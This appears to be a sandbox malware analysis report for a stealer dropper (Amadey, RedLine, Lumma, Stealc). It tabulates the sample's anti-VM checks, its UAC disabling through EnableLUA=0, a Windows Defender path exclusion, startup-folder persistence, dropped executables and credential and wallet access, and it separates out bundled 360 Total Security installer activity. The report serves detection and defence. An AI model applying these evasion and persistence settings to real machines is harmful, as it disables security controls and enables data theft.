Malware Analysis Report

2024-07-11 11:00

Sample ID 240530-dezyaabh91
Target cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA256 cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
Tags
amadey lumma redline stealc 1 49e482 @logscloudyt_bot zzvv bootkit discovery evasion execution infostealer persistence ransomware spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc

Threat Level: Known bad

The file cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc was found to be: Known bad.

Reading the signature tables below by their Process column, the detonation resolves into three layers, and the column is what separates them.

The submitted sample and axplont.exe (dropped into Temp\1b29d73536 and executed several times) perform the anti-analysis probes (the VirtualBox ACPI table VBOX__, the SystemBiosVersion/VideoBiosVersion values, the Software\Wine key) and execute the payloads fetched into numbered Temp subdirectories (33333.exe, fileosn.exe, lumma1234.exe, gold.exe, swizzzz.exe, file300un.exe) and into Pictures. The Amadey, RedLine, Lumma Stealer and Stealc detections belong to this layer.

file300un.exe is the component that sets EnableLUA to 0 and registers its own path under Windows Defender\Exclusions\Paths. ORjTvDm.exe, run from C:\Windows\Temp, drops two Chrome extensions and opens the machine Group Policy Registry.pol for modification. AddInProcess32.exe, a .NET Framework host process, writes the .bat files into the Startup folder, and RegAsm.exe is among the processes querying the Geo\Nation value, so both of those Windows binaries should be treated as injection hosts rather than as the origin of the behaviour.

360TS_Setup.exe is a 360 Total Security installer dropped into Pictures and run from C:\Program Files (x86)\1717037821_0. Its components (360TS_Setup.exe, QHActiveDefense.exe, QHSafeTray.exe, EaInstHelper64.exe, KB931125-rootsupd.exe, and MenuEx64.dll registered through regsvr32.exe) are the processes behind the driver drops, the service ImagePath writes, the Active Setup and COM registrations, the QHSafeTray Run key, the Avast/Avira/ESET/Doctor Web registry probes and most of the PhysicalDrive0 opens. Those rows are installer behaviour of the bundled package and should not be read as capabilities of the stealers. Two things in that area still need a manual look: the PhysicalDrive0 open by jfwLrbtuGmt3WgBnEjEXTdp4.exe in Pictures, which is not a 360 component, and the two bcdedit.exe executions, for which the report records no parent and no command line.

Malicious Activity Summary

RedLine

Lumma Stealer

RedLine payload

Amadey

UAC bypass

Stealc

Windows security bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Sets service image path in registry

Modifies Installed Components in the registry

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Themida packer

Windows security modification

Drops startup file

Registers COM server for autorun

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Reads data files stored by FTP clients

Unexpected DNS network traffic destination

Identifies Wine through registry keys

Executes dropped EXE

Modifies system executable filetype association

Adds Run key to start application

Checks installed software on the system

Enumerates connected drives

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Writes to the Master Boot Record (MBR)

Drops Chrome extension

Drops desktop.ini file(s)

Checks for any installed AV software in registry

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

System policy modification

Modifies data under HKEY_USERS

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: LoadsDriver

Modifies registry class

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-30 02:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 02:56

Reported

2024-05-30 02:58

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

146s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\360elam64.sys C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
File opened for modification C:\Windows\system32\drivers\360FsFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\system32\drivers\360FsFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\SysWOW64\drivers\360AvFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\360AvFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\system32\drivers\360elam64.sys C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\IsInstalled = "1" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Version = "41,0,2195,0" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Locale = "*" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ComponentID = "Windows Roots Update" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A} C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ = "RootsUpdate" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHProtected\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\WscReg.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360Camera\ImagePath = "System32\\Drivers\\360Camera64.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AntiHacker\ImagePath = "System32\\Drivers\\360AntiHacker64.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BAPIDRV\ImagePath = "system32\\DRIVERS\\BAPIDRV64.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360Box64\ImagePath = "system32\\DRIVERS\\360Box64.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360elam64\ImagePath = "system32\\DRIVERS\\360elam64.sys" C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360netmon\ImagePath = "system32\\DRIVERS\\360netmon.sys" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AvFlt\ImagePath = "system32\\drivers\\360AvFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360elam64\ImagePath = "system32\\DRIVERS\\360elam64.sys" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SJl7XFiiozcizRe9rOsbUIlM.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W3RHf5IDlauw2xLLEFu6nXpk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\90k57km6dgCoPYO3YD7Tth99.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CUPKdmqFz1ooxBrPhSDvJjzn.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uz12620uwxZn724uCMM9FgMO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pjO9176lBkxDLSxA7OzRGbEQ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\Pictures\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB35D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\360Tray.exe\" /start" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\360Tray.exe\" /start" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\DisplayName C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ImagePath C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Doctor Web\InstalledComponents C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\DisplayName = "360 Total Security" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Start = "2" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ObjectName = "LocalSystem" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Start C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Avira C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ErrorControl C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Group C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Alias C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Avira C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ErrorControl = "1" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Group = "TDI" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Type = "16" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Doctor Web\InstalledComponents C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ObjectName C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Type C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
